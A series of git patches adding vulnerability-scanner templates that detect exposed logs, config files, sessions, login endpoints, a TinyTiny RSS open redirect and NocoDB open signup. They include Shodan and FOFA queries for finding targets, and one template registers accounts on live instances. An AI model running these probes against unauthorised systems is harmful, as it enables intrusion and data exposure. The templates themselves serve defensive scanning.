springboot-x-application-context + +info: + name: Spring Boot `X-Application-Context` Header Exposure + author: DhiyaneshDK + severity: low + description: | + Detected the presence of the X-Application-Context header in HTTP responses, which can expose sensitive application context information. + reference: + - https://github.com/spring-projects/spring-boot/issues/1308 + metadata: + verified: true + max-request: 1 + shodan-query: "X-Application-Context" + tags: springboot,misconfig,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: header + words: + - '^X-Application-Context:\s*\S.+$' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: header + group: 1 + regex: + - '^X-Application-Context:\s*\S.+$' From a94cd5181a14d9f878d5957bba8d05962fa8fb2f Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 19 Jan 2026 11:43:30 +0530 Subject: [PATCH 13/92] ServiceStack Request Logs - Unauthenticated Access --- .../logs/servicestack-requestlogs.yaml | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/exposures/logs/servicestack-requestlogs.yaml diff --git a/http/exposures/logs/servicestack-requestlogs.yaml b/http/exposures/logs/servicestack-requestlogs.yaml new file mode 100644 index 00000000000..6ef58f123fc --- /dev/null +++ b/http/exposures/logs/servicestack-requestlogs.yaml @@ -0,0 +1,49 @@ +id: servicestack-requestlogs + +info: + name: ServiceStack Request Logs - Unauthenticated Access + author: DhiyaneshDk + severity: high + description: | + Detected ServiceStack Request Logs endpoint was accessible without authentication. + reference: + - https://docs.servicestack.net/request-logger + - https://docs.servicestack.net/admin-ui-profiling + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-200 + cpe: cpe:2.3:a:servicestack:servicestack:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 3 + shodan-query: http.html:"ServiceStack" + fofa-query: body="ServiceStack" + tags: servicestack,exposure,misconfig,logs + +http: + - method: GET + path: + - "{{BaseURL}}/requestlogs" + - "{{BaseURL}}/api/requestlogs" + - "{{BaseURL}}/json/reply/RequestLogs" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"Results":[' + - '"Usage":{' + condition: and + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 200 From 412e6269755c7af0ff608bee564d84443f46388e Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Mon, 19 Jan 2026 12:07:56 +0530 Subject: [PATCH 14/92] Create sendmail-forward-exposure.yaml --- .../sendmail-forward-exposure.yaml | 54 +++++++++++++++++++ 1 file changed, 54 insertions(+) create mode 100644 http/misconfiguration/sendmail-forward-exposure.yaml diff --git a/http/misconfiguration/sendmail-forward-exposure.yaml b/http/misconfiguration/sendmail-forward-exposure.yaml new file mode 100644 index 00000000000..4ca259b57ff --- /dev/null +++ b/http/misconfiguration/sendmail-forward-exposure.yaml @@ -0,0 +1,54 @@ +id: sendmail-forward-exposure + +info: + name: Sendmail .forward File - Exposure + author: ritikchaddha + severity: low + description: | + Sendmail .forward file is publicly accessible. This file is used to configure email forwarding and can expose sensitive information including email addresses, forwarding rules, and potentially executable commands (pipe to programs). + reference: + - https://www.sendmail.org/~ca/email/doc8.12/op-sh-4.html + - https://linux.die.net/man/5/forward + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + metadata: + max-request: 4 + verified: true + tags: exposure,sendmail,config,mail,mta + +http: + - method: GET + path: + - "{{BaseURL}}/.forward" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - '[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}"' + - "\\|[\\s]*/[a-zA-Z0-9/_.-]+" + - ":include:[\\s]*/[a-zA-Z0-9/_.-]+" + - "^/[a-zA-Z0-9/_.-]+/[a-zA-Z0-9/_.-]+$" + condition: or + + - type: word + part: content_type + words: + - "text/plain" + + - type: status + status: + - 200 + + - type: word + part: body + words: + - " Date: Mon, 19 Jan 2026 12:25:19 +0530 Subject: [PATCH 15/92] Visual Studio Code Settings - Credential Exposure --- http/exposures/files/vscode-settings.yaml | 49 +++++++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/exposures/files/vscode-settings.yaml diff --git a/http/exposures/files/vscode-settings.yaml b/http/exposures/files/vscode-settings.yaml new file mode 100644 index 00000000000..c91287b7e40 --- /dev/null +++ b/http/exposures/files/vscode-settings.yaml @@ -0,0 +1,49 @@ +id: vscode-settings + +info: + name: Visual Studio Code Settings - Credential Exposure + author: DhiyaneshDk + severity: low + description: | + Detected exposed Visual Studio Code configuration files that were accessible over HTTP, which could have led to credential leakage or sensitive workspace disclosure. + metadata: + max-request: 3 + verified: true + shodan-query: html:".vscode" html:"Directory listing for /" + tags: exposure,config,vscode,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/.vscode/settings.json" + - "{{BaseURL}}/settings.json" + - "{{BaseURL}}/.vscode/launch.json" + - "{{BaseURL}}/.vscode/tasks.json" + - "{{BaseURL}}/.vscode-server/data/Machine/settings.json" + + stop-at-first-match: true + + matchers: + - type: dsl + name: launch + dsl: + - 'status_code == 200' + - 'contains(content_type, "application/json")' + - 'contains_all(body, "launch","configurations")' + condition: and + + - type: dsl + name: settings + dsl: + - 'status_code == 200' + - 'contains(content_type, "application/json")' + - 'contains_any(body, "ignoreLimitWarning","yaml.schemas","search.exclude","sqltools.connections","python","livePreview","multipliers","matchCommandLine","errorSquiggles","editor")' + condition: and + + - type: dsl + name: task + dsl: + - 'status_code == 200' + - 'contains(content_type, "application/json")' + - 'contains_all(body, "version","tasks")' + condition: and From f4764123339b6508eac7e4da27b4ad775f0acccc Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 19 Jan 2026 12:32:43 +0530 Subject: [PATCH 16/92] Create sharepoint-exposed-login-endpoint.yaml --- .../sharepoint-exposed-login-endpoint.yaml | 43 +++++++++++++++++++ 1 file changed, 43 insertions(+) create mode 100644 http/misconfiguration/microsoft/sharepoint-exposed-login-endpoint.yaml diff --git a/http/misconfiguration/microsoft/sharepoint-exposed-login-endpoint.yaml b/http/misconfiguration/microsoft/sharepoint-exposed-login-endpoint.yaml new file mode 100644 index 00000000000..e9cd50a476d --- /dev/null +++ b/http/misconfiguration/microsoft/sharepoint-exposed-login-endpoint.yaml @@ -0,0 +1,43 @@ +id: sharepoint-exposed-login-endpoint + +info: + name: Microsoft SharePoint - Exposed Login Endpoint + author: pussycat0x + severity: info + description: | + Detected Microsoft SharePoint login and authentication endpoints. + reference: + - https://learn.microsoft.com/en-us/sharepoint/authentication + - https://learn.microsoft.com/en-us/sharepoint/security-for-sharepoint-server/plan-for-administrative-and-service-accounts + - https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/CMS/Sharepoint-Ennumeration.txt + metadata: + verified: true + max-request: 2 + shodan-query: http.component:"Microsoft SharePoint" + fofa-query: app="Microsoft-SharePoint" + product: sharepoint + vendor: microsoft + tags: sharepoint,microsoft,login,exposure,misconfig,panel,tech + +http: + - method: GET + path: + - "{{BaseURL}}/_layouts/15/Authenticate.aspx" + - "{{BaseURL}}/_layouts/Authenticate.aspx" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - "(?i)MicrosoftSharePointTeamServices" + + - type: status + status: + - 401 + + From bdf9e10d4616f27a908b982065eb63cfb29e47c7 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 19 Jan 2026 12:38:36 +0530 Subject: [PATCH 17/92] TinyTiny RSS Open Redirect --- .../other/tinytiny-rss-redirect.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/vulnerabilities/other/tinytiny-rss-redirect.yaml diff --git a/http/vulnerabilities/other/tinytiny-rss-redirect.yaml b/http/vulnerabilities/other/tinytiny-rss-redirect.yaml new file mode 100644 index 00000000000..5b0354cc9e8 --- /dev/null +++ b/http/vulnerabilities/other/tinytiny-rss-redirect.yaml @@ -0,0 +1,32 @@ +id: tinytiny-rss-redirect + +info: + name: TinyTiny RSS Open Redirect + author: DhiyaneshDk + severity: low + description: | + Detected an open redirect vulnerability in Tiny Tiny RSS where the return parameter in public.php was abused to redirect users to an attacker-controlled external URL after the authentication flow. + reference: + - https://seclists.org/oss-sec/2019/q1/155 + metadata: + verified: true + max-request: 1 + shodan-query: html:"Tiny Tiny RSS" + tags: redirect,tiny-tiny,rss + +http: + - method: GET + path: + - "{{BaseURL}}/public.php?return=http%3a%2f%2finteract.sh%2f&op=login&login=password=&profile=0" + + matchers-condition: and + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + + - type: status + status: + - 302 + - 301 From 1cebfd639426e3f12c97db2f88cbefc3c2ccfd41 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 19 Jan 2026 12:44:08 +0530 Subject: [PATCH 18/92] Update tinytiny-rss-redirect.yaml --- http/vulnerabilities/other/tinytiny-rss-redirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/vulnerabilities/other/tinytiny-rss-redirect.yaml b/http/vulnerabilities/other/tinytiny-rss-redirect.yaml index 5b0354cc9e8..369da6ae4eb 100644 --- a/http/vulnerabilities/other/tinytiny-rss-redirect.yaml +++ b/http/vulnerabilities/other/tinytiny-rss-redirect.yaml @@ -18,7 +18,7 @@ http: - method: GET path: - "{{BaseURL}}/public.php?return=http%3a%2f%2finteract.sh%2f&op=login&login=password=&profile=0" - + matchers-condition: and matchers: - type: regex From 04bc9d9e43a963a5cfd956b52ab8b5e52af9e95b Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 19 Jan 2026 13:39:49 +0530 Subject: [PATCH 19/92] Create nocodb-public-registration-enabled.yaml --- .../nocodb-public-registration-enabled.yaml | 49 +++++++++++++++++++ 1 file changed, 49 insertions(+) create mode 100644 http/misconfiguration/nocodb-public-registration-enabled.yaml diff --git a/http/misconfiguration/nocodb-public-registration-enabled.yaml b/http/misconfiguration/nocodb-public-registration-enabled.yaml new file mode 100644 index 00000000000..1b5042a6c44 --- /dev/null +++ b/http/misconfiguration/nocodb-public-registration-enabled.yaml @@ -0,0 +1,49 @@ +id: nocodb-public-registration-enabled + +info: + name: NocoDB Public Registration Enabled + author: pussycat0x + severity: medium + description: | + Detected NocoDB instances that allow public user registration without requiring an invitation. + This misconfiguration allows anyone to create an account on the NocoDB instance, potentially + leading to unauthorized access to databases and sensitive information. + reference: + - https://docs.nocodb.com/getting-started/self-hosted/environment-variables/ + - https://nocodb.com/docs/product-docs/account-settings/oss-specific-details + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"NocoDB" + fofa-query: title="NocoDB" + product: nocodb + vendor: nocodb + tags: nocodb,misconfig,exposure,intrusive + +variables: + email: "{{randstr}}@{{rand_base(5)}}.com" + password: "{{rand_base(8)}}" + +http: + - raw: + - | + POST /api/v1/auth/user/signup HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"email":"{{email}}","password":"{{password}}"} + + matchers-condition: and + matchers: + - type: dsl + dsl: + - contains(body, 'token') + - contains(header, 'application/json') + - "status_code == 200" + condition: and + + extractors: + - type: dsl + dsl: + - '"Email: " + email + ". Password: "+ password' + From b8f4fe230320b90c7a81ebb7cba87634f17cc715 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Mon, 19 Jan 2026 13:43:46 +0530 Subject: [PATCH 20/92] Laravel Sessions Folder Exposure --- .../laravel-sessions-exposure.yaml | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/misconfiguration/laravel-sessions-exposure.yaml diff --git a/http/misconfiguration/laravel-sessions-exposure.yaml b/http/misconfiguration/laravel-sessions-exposure.yaml new file mode 100644 index 00000000000..e6ca9818f1a --- /dev/null +++ b/http/misconfiguration/laravel-sessions-exposure.yaml @@ -0,0 +1,37 @@ +id: laravel-sessions-exposure + +info: + name: Laravel Sessions Folder Exposure + author: DhiyaneshDk + severity: high + description: | + Detected unauthenticated access to the Laravel session storage directory, allowing attackers to browse and download session files that may contain active authentication tokens, CSRF tokens, and serialized user data. + metadata: + max-request: 2 + verified: true + shodan-query: http.html:"Index of" http.html:"sessions" + fofa-query: body="Index of" && body="sessions" + tags: laravel,exposure,misconfig,storage,session + +http: + - method: GET + path: + - "{{BaseURL}}/storage/framework/sessions/" + - "{{BaseURL}}/storage/sessions/" + + stop-at-first-match: true + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Index of" + - "Parent Directory" + - "Index of" + - "Directory listing for" + condition: or + + - type: status + status: + - 200 From 732a56cb72fa279dde9589022fc1893a792cb4c2 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Mon, 19 Jan 2026 13:45:37 +0530 Subject: [PATCH 21/92] Update nocodb-public-registration-enabled.yaml --- http/misconfiguration/nocodb-public-registration-enabled.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/http/misconfiguration/nocodb-public-registration-enabled.yaml b/http/misconfiguration/nocodb-public-registration-enabled.yaml index 1b5042a6c44..d4daf32eed4 100644 --- a/http/misconfiguration/nocodb-public-registration-enabled.yaml +++ b/http/misconfiguration/nocodb-public-registration-enabled.yaml @@ -33,7 +33,6 @@ http: {"email":"{{email}}","password":"{{password}}"} - matchers-condition: and matchers: - type: dsl dsl: From 79058f2decebd0ab438c8e6164c9ad27e85585a7 Mon Sep 17 00:00:00 2001 From: ghost <ghost@users.noreply.github.com> Date: Mon, 19 Jan 2026 08:20:19 +0000 Subject: [PATCH 22/92] =?UTF-8?q?chore:=20sign=20templates=20=F0=9F=A4=96?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- code/cves/2014/CVE-2014-0160.yaml | 2 +- code/cves/2019/CVE-2019-0604.yaml | 2 +- code/cves/2019/CVE-2019-14287.yaml | 2 +- code/cves/2021/CVE-2021-3156.yaml | 2 +- code/cves/2022/CVE-2022-42475.yaml | 2 +- code/cves/2023/CVE-2023-2640.yaml | 2 +- code/cves/2023/CVE-2023-6246.yaml | 2 +- code/cves/2024/CVE-2024-22120.yaml | 2 +- code/cves/2024/CVE-2024-55556.yaml | 2 +- code/cves/2024/CVE-2024-56331.yaml | 2 +- code/cves/2024/CVE-2024-9487.yaml | 2 +- code/cves/2025/CVE-2025-1550.yaml | 2 +- code/cves/2025/CVE-2025-22457.yaml | 2 +- code/cves/2025/CVE-2025-25291.yaml | 2 +- code/cves/2025/CVE-2025-32433.yaml | 2 +- code/cves/2025/CVE-2025-54309.yaml | 2 +- dast/cves/2020/CVE-2020-9402.yaml | 2 +- dast/cves/2021/CVE-2021-35042.yaml | 2 +- dast/cves/2022/CVE-2022-22965.yaml | 2 +- dast/cves/2022/CVE-2022-42889.yaml | 2 +- file/logs/aspnet-framework-exceptions.yaml | 2 +- file/logs/nodejs-framework-exceptions.yaml | 2 +- headless/cves/2018/CVE-2018-25031.yaml | 2 +- headless/cves/2022/CVE-2022-29455-headless.yaml | 2 +- headless/cves/2024/CVE-2024-29882.yaml | 2 +- headless/cves/2024/CVE-2024-38526.yaml | 2 +- headless/cves/2025/CVE-2025-29927-HEADLESS.yaml | 2 +- headless/cves/2025/CVE-2025-8191.yaml | 2 +- http/cves/2000/CVE-2000-0114.yaml | 2 +- http/cves/2000/CVE-2000-0760.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- http/cves/2004/CVE-2004-0519.yaml | 2 +- http/cves/2004/CVE-2004-1965.yaml | 2 +- http/cves/2005/CVE-2005-2428.yaml | 2 +- http/cves/2005/CVE-2005-3128.yaml | 2 +- http/cves/2005/CVE-2005-3344.yaml | 2 +- http/cves/2005/CVE-2005-3634.yaml | 2 +- http/cves/2005/CVE-2005-4385.yaml | 2 +- http/cves/2006/CVE-2006-1681.yaml | 2 +- http/cves/2006/CVE-2006-2842.yaml | 2 +- http/cves/2006/CVE-2006-3392.yaml | 2 +- http/cves/2007/CVE-2007-0885.yaml | 2 +- http/cves/2007/CVE-2007-2449.yaml | 2 +- http/cves/2007/CVE-2007-3010.yaml | 2 +- http/cves/2007/CVE-2007-4504.yaml | 2 +- http/cves/2007/CVE-2007-4556.yaml | 2 +- http/cves/2007/CVE-2007-5728.yaml | 2 +- http/cves/2008/CVE-2008-1059.yaml | 2 +- http/cves/2008/CVE-2008-1061.yaml | 2 +- http/cves/2008/CVE-2008-2398.yaml | 2 +- http/cves/2008/CVE-2008-2650.yaml | 2 +- http/cves/2008/CVE-2008-4668.yaml | 2 +- http/cves/2008/CVE-2008-4764.yaml | 2 +- http/cves/2008/CVE-2008-5587.yaml | 2 +- http/cves/2008/CVE-2008-6172.yaml | 2 +- http/cves/2008/CVE-2008-6222.yaml | 2 +- http/cves/2008/CVE-2008-6465.yaml | 2 +- http/cves/2008/CVE-2008-6668.yaml | 2 +- http/cves/2008/CVE-2008-6982.yaml | 2 +- http/cves/2008/CVE-2008-7269.yaml | 2 +- http/cves/2009/CVE-2009-0545.yaml | 2 +- http/cves/2009/CVE-2009-1496.yaml | 2 +- http/cves/2009/CVE-2009-1558.yaml | 2 +- http/cves/2009/CVE-2009-1872.yaml | 2 +- http/cves/2009/CVE-2009-2015.yaml | 2 +- http/cves/2009/CVE-2009-2100.yaml | 2 +- http/cves/2009/CVE-2009-3053.yaml | 2 +- http/cves/2009/CVE-2009-3318.yaml | 2 +- http/cves/2009/CVE-2009-4202.yaml | 2 +- http/cves/2009/CVE-2009-4223.yaml | 2 +- http/cves/2009/CVE-2009-4679.yaml | 2 +- http/cves/2009/CVE-2009-5020.yaml | 2 +- http/cves/2009/CVE-2009-5114.yaml | 2 +- http/cves/2010/CVE-2010-0696.yaml | 2 +- http/cves/2010/CVE-2010-0759.yaml | 2 +- http/cves/2010/CVE-2010-0942.yaml | 2 +- http/cves/2010/CVE-2010-0943.yaml | 2 +- http/cves/2010/CVE-2010-0944.yaml | 2 +- http/cves/2010/CVE-2010-0972.yaml | 2 +- http/cves/2010/CVE-2010-0982.yaml | 2 +- http/cves/2010/CVE-2010-0985.yaml | 2 +- http/cves/2010/CVE-2010-1056.yaml | 2 +- http/cves/2010/CVE-2010-1217.yaml | 2 +- http/cves/2010/CVE-2010-1219.yaml | 2 +- http/cves/2010/CVE-2010-1302.yaml | 2 +- http/cves/2010/CVE-2010-1304.yaml | 2 +- http/cves/2010/CVE-2010-1306.yaml | 2 +- http/cves/2010/CVE-2010-1307.yaml | 2 +- http/cves/2010/CVE-2010-1308.yaml | 2 +- http/cves/2010/CVE-2010-1312.yaml | 2 +- http/cves/2010/CVE-2010-1313.yaml | 2 +- http/cves/2010/CVE-2010-1314.yaml | 2 +- http/cves/2010/CVE-2010-1315.yaml | 2 +- http/cves/2010/CVE-2010-1340.yaml | 2 +- http/cves/2010/CVE-2010-1353.yaml | 2 +- http/cves/2010/CVE-2010-1429.yaml | 2 +- http/cves/2010/CVE-2010-1461.yaml | 2 +- http/cves/2010/CVE-2010-1469.yaml | 2 +- http/cves/2010/CVE-2010-1471.yaml | 2 +- http/cves/2010/CVE-2010-1474.yaml | 2 +- http/cves/2010/CVE-2010-1475.yaml | 2 +- http/cves/2010/CVE-2010-1476.yaml | 2 +- http/cves/2010/CVE-2010-1478.yaml | 2 +- http/cves/2010/CVE-2010-1495.yaml | 2 +- http/cves/2010/CVE-2010-1532.yaml | 2 +- http/cves/2010/CVE-2010-1533.yaml | 2 +- http/cves/2010/CVE-2010-1535.yaml | 2 +- http/cves/2010/CVE-2010-1540.yaml | 2 +- http/cves/2010/CVE-2010-1586.yaml | 2 +- http/cves/2010/CVE-2010-1601.yaml | 2 +- http/cves/2010/CVE-2010-1602.yaml | 2 +- http/cves/2010/CVE-2010-1603.yaml | 2 +- http/cves/2010/CVE-2010-1607.yaml | 2 +- http/cves/2010/CVE-2010-1657.yaml | 2 +- http/cves/2010/CVE-2010-1659.yaml | 2 +- http/cves/2010/CVE-2010-1714.yaml | 2 +- http/cves/2010/CVE-2010-1715.yaml | 2 +- http/cves/2010/CVE-2010-1717.yaml | 2 +- http/cves/2010/CVE-2010-1718.yaml | 2 +- http/cves/2010/CVE-2010-1719.yaml | 2 +- http/cves/2010/CVE-2010-1722.yaml | 2 +- http/cves/2010/CVE-2010-1723.yaml | 2 +- http/cves/2010/CVE-2010-1870.yaml | 2 +- http/cves/2010/CVE-2010-1875.yaml | 2 +- http/cves/2010/CVE-2010-1878.yaml | 2 +- http/cves/2010/CVE-2010-1952.yaml | 2 +- http/cves/2010/CVE-2010-1954.yaml | 2 +- http/cves/2010/CVE-2010-1955.yaml | 2 +- http/cves/2010/CVE-2010-1956.yaml | 2 +- http/cves/2010/CVE-2010-1957.yaml | 2 +- http/cves/2010/CVE-2010-1977.yaml | 2 +- http/cves/2010/CVE-2010-1979.yaml | 2 +- http/cves/2010/CVE-2010-1981.yaml | 2 +- http/cves/2010/CVE-2010-1983.yaml | 2 +- http/cves/2010/CVE-2010-2018.yaml | 2 +- http/cves/2010/CVE-2010-2033.yaml | 2 +- http/cves/2010/CVE-2010-2034.yaml | 2 +- http/cves/2010/CVE-2010-2035.yaml | 2 +- http/cves/2010/CVE-2010-2036.yaml | 2 +- http/cves/2010/CVE-2010-2037.yaml | 2 +- http/cves/2010/CVE-2010-2045.yaml | 2 +- http/cves/2010/CVE-2010-2050.yaml | 2 +- http/cves/2010/CVE-2010-2122.yaml | 2 +- http/cves/2010/CVE-2010-2259.yaml | 2 +- http/cves/2010/CVE-2010-2307.yaml | 2 +- http/cves/2010/CVE-2010-2507.yaml | 2 +- http/cves/2010/CVE-2010-2680.yaml | 2 +- http/cves/2010/CVE-2010-2682.yaml | 2 +- http/cves/2010/CVE-2010-2857.yaml | 2 +- http/cves/2010/CVE-2010-2861.yaml | 2 +- http/cves/2010/CVE-2010-2918.yaml | 2 +- http/cves/2010/CVE-2010-3203.yaml | 2 +- http/cves/2010/CVE-2010-3426.yaml | 2 +- http/cves/2010/CVE-2010-4231.yaml | 2 +- http/cves/2010/CVE-2010-4239.yaml | 2 +- http/cves/2010/CVE-2010-4617.yaml | 2 +- http/cves/2010/CVE-2010-4719.yaml | 2 +- http/cves/2010/CVE-2010-4977.yaml | 2 +- http/cves/2010/CVE-2010-5028.yaml | 2 +- http/cves/2011/CVE-2011-0049.yaml | 2 +- http/cves/2011/CVE-2011-1669.yaml | 2 +- http/cves/2011/CVE-2011-2744.yaml | 2 +- http/cves/2011/CVE-2011-3600.yaml | 2 +- http/cves/2011/CVE-2011-4336.yaml | 2 +- http/cves/2011/CVE-2011-4618.yaml | 2 +- http/cves/2011/CVE-2011-4624.yaml | 2 +- http/cves/2011/CVE-2011-4640.yaml | 2 +- http/cves/2011/CVE-2011-4804.yaml | 2 +- http/cves/2011/CVE-2011-4926.yaml | 2 +- http/cves/2011/CVE-2011-5106.yaml | 2 +- http/cves/2011/CVE-2011-5107.yaml | 2 +- http/cves/2011/CVE-2011-5179.yaml | 2 +- http/cves/2011/CVE-2011-5181.yaml | 2 +- http/cves/2011/CVE-2011-5252.yaml | 2 +- http/cves/2012/CVE-2012-0896.yaml | 2 +- http/cves/2012/CVE-2012-0901.yaml | 2 +- http/cves/2012/CVE-2012-0981.yaml | 2 +- http/cves/2012/CVE-2012-0991.yaml | 2 +- http/cves/2012/CVE-2012-0996.yaml | 2 +- http/cves/2012/CVE-2012-10018.yaml | 2 +- http/cves/2012/CVE-2012-1226.yaml | 2 +- http/cves/2012/CVE-2012-1823.yaml | 2 +- http/cves/2012/CVE-2012-1835.yaml | 2 +- http/cves/2012/CVE-2012-4032.yaml | 2 +- http/cves/2012/CVE-2012-4242.yaml | 2 +- http/cves/2012/CVE-2012-4273.yaml | 2 +- http/cves/2012/CVE-2012-4547.yaml | 2 +- http/cves/2012/CVE-2012-4768.yaml | 2 +- http/cves/2012/CVE-2012-4878.yaml | 2 +- http/cves/2012/CVE-2012-4889.yaml | 2 +- http/cves/2012/CVE-2012-4982.yaml | 2 +- http/cves/2012/CVE-2012-5321.yaml | 2 +- http/cves/2012/CVE-2012-5913.yaml | 2 +- http/cves/2012/CVE-2012-6499.yaml | 2 +- http/cves/2013/CVE-2013-1965.yaml | 2 +- http/cves/2013/CVE-2013-2287.yaml | 2 +- http/cves/2013/CVE-2013-2621.yaml | 2 +- http/cves/2013/CVE-2013-3526.yaml | 2 +- http/cves/2013/CVE-2013-3827.yaml | 2 +- http/cves/2013/CVE-2013-4117.yaml | 2 +- http/cves/2013/CVE-2013-4625.yaml | 2 +- http/cves/2013/CVE-2013-5979.yaml | 2 +- http/cves/2013/CVE-2013-6281.yaml | 2 +- http/cves/2013/CVE-2013-7240.yaml | 2 +- http/cves/2013/CVE-2013-7285.yaml | 2 +- http/cves/2014/CVE-2014-100004.yaml | 2 +- http/cves/2014/CVE-2014-2383.yaml | 2 +- http/cves/2014/CVE-2014-2962.yaml | 2 +- http/cves/2014/CVE-2014-3206.yaml | 2 +- http/cves/2014/CVE-2014-3744.yaml | 2 +- http/cves/2014/CVE-2014-4210.yaml | 2 +- http/cves/2014/CVE-2014-4513.yaml | 2 +- http/cves/2014/CVE-2014-4536.yaml | 2 +- http/cves/2014/CVE-2014-4539.yaml | 2 +- http/cves/2014/CVE-2014-4544.yaml | 2 +- http/cves/2014/CVE-2014-4550.yaml | 2 +- http/cves/2014/CVE-2014-4558.yaml | 2 +- http/cves/2014/CVE-2014-4561.yaml | 2 +- http/cves/2014/CVE-2014-4577.yaml | 2 +- http/cves/2014/CVE-2014-4940.yaml | 2 +- http/cves/2014/CVE-2014-4941.yaml | 2 +- http/cves/2014/CVE-2014-4942.yaml | 2 +- http/cves/2014/CVE-2014-5111.yaml | 2 +- http/cves/2014/CVE-2014-5181.yaml | 2 +- http/cves/2014/CVE-2014-5187.yaml | 2 +- http/cves/2014/CVE-2014-5258.yaml | 2 +- http/cves/2014/CVE-2014-5368.yaml | 2 +- http/cves/2014/CVE-2014-6308.yaml | 2 +- http/cves/2014/CVE-2014-8682.yaml | 2 +- http/cves/2014/CVE-2014-9094.yaml | 2 +- http/cves/2014/CVE-2014-9180.yaml | 2 +- http/cves/2014/CVE-2014-9444.yaml | 2 +- http/cves/2014/CVE-2014-9606.yaml | 2 +- http/cves/2014/CVE-2014-9607.yaml | 2 +- http/cves/2014/CVE-2014-9608.yaml | 2 +- http/cves/2014/CVE-2014-9614.yaml | 2 +- http/cves/2014/CVE-2014-9615.yaml | 2 +- http/cves/2014/CVE-2014-9617.yaml | 2 +- http/cves/2014/CVE-2014-9618.yaml | 2 +- http/cves/2014/CVE-2014-9735.yaml | 2 +- http/cves/2015/CVE-2015-0554.yaml | 2 +- http/cves/2015/CVE-2015-1000012.yaml | 2 +- http/cves/2015/CVE-2015-10141.yaml | 2 +- http/cves/2015/CVE-2015-2067.yaml | 2 +- http/cves/2015/CVE-2015-2068.yaml | 2 +- http/cves/2015/CVE-2015-2196.yaml | 2 +- http/cves/2015/CVE-2015-2755.yaml | 2 +- http/cves/2015/CVE-2015-2794.yaml | 2 +- http/cves/2015/CVE-2015-2863.yaml | 2 +- http/cves/2015/CVE-2015-3337.yaml | 2 +- http/cves/2015/CVE-2015-3648.yaml | 2 +- http/cves/2015/CVE-2015-4062.yaml | 2 +- http/cves/2015/CVE-2015-4127.yaml | 2 +- http/cves/2015/CVE-2015-4414.yaml | 2 +- http/cves/2015/CVE-2015-4666.yaml | 2 +- http/cves/2015/CVE-2015-5354.yaml | 2 +- http/cves/2015/CVE-2015-5461.yaml | 2 +- http/cves/2015/CVE-2015-5469.yaml | 2 +- http/cves/2015/CVE-2015-5471.yaml | 2 +- http/cves/2015/CVE-2015-6477.yaml | 2 +- http/cves/2015/CVE-2015-6544.yaml | 2 +- http/cves/2015/CVE-2015-6920.yaml | 2 +- http/cves/2015/CVE-2015-7377.yaml | 2 +- http/cves/2015/CVE-2015-7780.yaml | 2 +- http/cves/2015/CVE-2015-7823.yaml | 2 +- http/cves/2015/CVE-2015-8349.yaml | 2 +- http/cves/2015/CVE-2015-8350.yaml | 2 +- http/cves/2015/CVE-2015-8813.yaml | 2 +- http/cves/2015/CVE-2015-9406.yaml | 2 +- http/cves/2015/CVE-2015-9415.yaml | 2 +- http/cves/2015/CVE-2015-9499.yaml | 2 +- http/cves/2016/CVE-2016-1000126.yaml | 2 +- http/cves/2016/CVE-2016-1000127.yaml | 2 +- http/cves/2016/CVE-2016-1000129.yaml | 2 +- http/cves/2016/CVE-2016-1000130.yaml | 2 +- http/cves/2016/CVE-2016-1000131.yaml | 2 +- http/cves/2016/CVE-2016-1000132.yaml | 2 +- http/cves/2016/CVE-2016-1000134.yaml | 2 +- http/cves/2016/CVE-2016-1000135.yaml | 2 +- http/cves/2016/CVE-2016-1000137.yaml | 2 +- http/cves/2016/CVE-2016-1000142.yaml | 2 +- http/cves/2016/CVE-2016-1000146.yaml | 2 +- http/cves/2016/CVE-2016-1000148.yaml | 2 +- http/cves/2016/CVE-2016-1000149.yaml | 2 +- http/cves/2016/CVE-2016-1000153.yaml | 2 +- http/cves/2016/CVE-2016-1000154.yaml | 2 +- http/cves/2016/CVE-2016-1000155.yaml | 2 +- http/cves/2016/CVE-2016-10033.yaml | 2 +- http/cves/2016/CVE-2016-10108.yaml | 2 +- 